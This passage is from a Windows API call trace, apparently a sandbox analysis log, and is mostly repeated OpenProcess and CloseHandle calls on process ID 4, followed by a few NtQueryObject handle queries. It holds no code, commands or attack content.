[0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.482] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.482] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.483] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.483] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.484] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.484] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.485] CloseHandle (hObject=0x0) returned 0 [0043.485] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.486] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.486] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.487] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.487] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.488] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.488] CloseHandle (hObject=0x0) returned 0 [0043.489] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.489] CloseHandle (hObject=0x0) returned 0 [0043.489] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.489] CloseHandle (hObject=0x0) returned 0 [0043.489] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.489] CloseHandle (hObject=0x0) returned 0 [0043.489] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.489] CloseHandle (hObject=0x0) returned 0 [0043.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.491] CloseHandle (hObject=0x0) returned 0 [0043.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.491] CloseHandle (hObject=0x0) returned 0 [0043.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.491] CloseHandle (hObject=0x0) returned 0 [0043.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.491] CloseHandle (hObject=0x0) returned 0 [0043.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.491] CloseHandle (hObject=0x0) returned 0 [0043.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.491] CloseHandle (hObject=0x0) returned 0 [0043.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.491] CloseHandle (hObject=0x0) returned 0 [0043.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.491] CloseHandle (hObject=0x0) returned 0 [0043.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.491] CloseHandle (hObject=0x0) returned 0 [0043.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.491] CloseHandle (hObject=0x0) returned 0 [0043.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.491] CloseHandle (hObject=0x0) returned 0 [0043.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.492] CloseHandle (hObject=0x0) returned 0 [0043.492] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.492] CloseHandle (hObject=0x0) returned 0 [0043.492] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.492] CloseHandle (hObject=0x0) returned 0 [0043.492] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.492] CloseHandle (hObject=0x0) returned 0 [0043.492] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.492] CloseHandle (hObject=0x0) returned 0 [0043.492] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.492] CloseHandle (hObject=0x0) returned 0 [0043.492] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.492] CloseHandle (hObject=0x0) returned 0 [0043.492] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.492] CloseHandle (hObject=0x0) returned 0 [0043.492] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.492] CloseHandle (hObject=0x0) returned 0 [0043.496] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.496] CloseHandle (hObject=0x1cc) returned 1 [0043.496] CloseHandle (hObject=0x1c8) returned 1 [0043.497] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.497] CloseHandle (hObject=0x1cc) returned 1 [0043.497] CloseHandle (hObject=0x1c8) returned 1 [0043.497] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.497] CloseHandle (hObject=0x1cc) returned 1 [0043.497] CloseHandle (hObject=0x1c8) returned 1 [0043.497] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.497] CloseHandle (hObject=0x1cc) returned 1 [0043.497] CloseHandle (hObject=0x1c8) returned 1 [0043.497] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.497] CloseHandle (hObject=0x1cc) returned 1 [0043.497] CloseHandle (hObject=0x1c8) returned 1 [0043.497] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.497] CloseHandle (hObject=0x1cc) returned 1 [0043.497] CloseHandle (hObject=0x1c8) returned 1 [0043.497] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.497] CloseHandle (hObject=0x1cc) returned 1 [0043.497] CloseHandle (hObject=0x1c8) returned 1 [0043.498] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.498] CloseHandle (hObject=0x1cc) returned 1 [0043.498] CloseHandle (hObject=0x1c8) returned 1 [0043.498] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.498] CloseHandle (hObject=0x1cc) returned 1 [0043.498] CloseHandle (hObject=0x1c8) returned 1 [0043.498] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.498] CloseHandle (hObject=0x1cc) returned 1 [0043.498] CloseHandle (hObject=0x1c8) returned 1 [0043.498] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.498] CloseHandle (hObject=0x1cc) returned 1 [0043.498] CloseHandle (hObject=0x1c8) returned 1 [0043.498] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.498] CloseHandle (hObject=0x1cc) returned 1 [0043.498] CloseHandle (hObject=0x1c8) returned 1 [0043.498] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.498] 